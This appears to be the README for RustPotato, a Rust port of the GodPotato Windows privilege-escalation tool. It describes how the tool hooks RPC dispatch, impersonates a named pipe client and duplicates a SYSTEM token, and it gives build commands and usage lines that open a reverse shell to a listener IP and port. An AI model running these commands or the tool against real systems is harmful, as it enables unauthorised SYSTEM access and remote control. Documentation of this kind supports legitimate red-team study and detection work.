RustPotato is a Rust-based implementation of GodPotato, a privilege escalation tool that abuses DCOM and RPC to leverage SeImpersonatePrivilege and gain NT AUTHORITY\SYSTEM privileges on Windows systems.
-
TCP-based Reverse Shell:
RustPotato features a TCP-based reverse shell based on Rustic64Shell. It leverages Winsock APIs for network communication and indirect NT APIs for pipe-based I/O redirection, enabling command execution throughcmdorpowershell. -
Indirect NTAPI:
RustPotato leverages indirect NTAPI calls for various operations, including token handling and manipulation.
Below is an overview of its execution flow, highlighting key operations at each step:
-
Locate
RPC_SERVER_INTERFACEStructure:
The tool scans the memory ofcombase.dllto find theRPC_SERVER_INTERFACEstructure, a critical component for managing RPC communications through the OXID Resolver. -
Hook RPC Dispatch Table:
RustPotato replaces the first entry in theRPC_DISPATCH_TABLEwith a custom function pointer, enabling interception and manipulation of specific RPC calls.
The named pipe server plays a central role in impersonation and privilege escalation:
-
Create Named Pipe:
A named pipe (e.g.,\\.\pipe\RustPotato) is created with unrestricted access, serving as the endpoint for client connections. -
Unmarshal COM Object:
RustPotato crafts and unmarshals a COM object, compelling RPCSS to establish a connection with the named pipe. -
Trigger RPCSS:
The unmarshalled object invokes RPC calls that traverse the hooked dispatch table, allowing RustPotato to intercept and manipulate the interactions. -
Impersonate Client:
When RPCSS connects to the named pipe, RustPotato impersonates the client usingImpersonateNamedPipeClientto assume its security context. -
Retrieve SYSTEM Token:
During impersonation, RustPotato locates and duplicates a token associated with theNT AUTHORITY\SYSTEMaccount.
-
Execute a Command:
RustPotato uses the duplicated token to execute a specified command, leveragingCreateProcessWithTokenW. -
Establish a Reverse Shell:
With reverse shell options (-hand-p), RustPotato connects to a listener and executes commands throughcmdorpowershell.
-
Restore RPC Dispatch Table:
Removes the custom function pointer from theRPC_DISPATCH_TABLEand restores the original state incombase.dll. -
Terminate Pipe Server:
Stops the named pipe server, releasing all associated resources and handles.
RustPotato provides the following features:
verbose: Enables detailed logging during execution.
Note: RustPotato supports only x86_64 targets (MSVC or GNU).
-
Basic build (only the process output is printed):
cargo build --release
-
Build with verbose logging:
cargo build --release --features verbose
Usage:
RustPotato.exe [command line] | [options]
Description:
Execute a command line or start a reverse shell.
Options:
-h <LHOST> Specify the IP address of the listener for the reverse shell.
-p <LPORT> Specify the port of the listener for the reverse shell.
-c <cmd|powershell>
Specify the shell to be used in the reverse shell (optional, default is cmd).
Examples:
Execute a command line:
RustPotato.exe "cmd.exe /c whoami"
Start a reverse shell with the default shell (cmd):
RustPotato.exe -h 192.168.1.100 -p 4444
Start a reverse shell with powershell:
RustPotato.exe -h 192.168.1.100 -p 4444 -c powershell
This project is for educational and research purposes only. RustPotato is a personal learning project focused on exploring Rust and Windows internals. Use it responsibly—any misuse is entirely your responsibility.
Always respect ethical guidelines and adhere to legal frameworks while conducting security research (or, honestly, in everything you do).
Special thanks to:
- BeichenDream for his work on GodPotato, which made this port possible!
- Resolving System Service Numbers Using The Exception Directory by MDsec for their insights on resolving SSNs.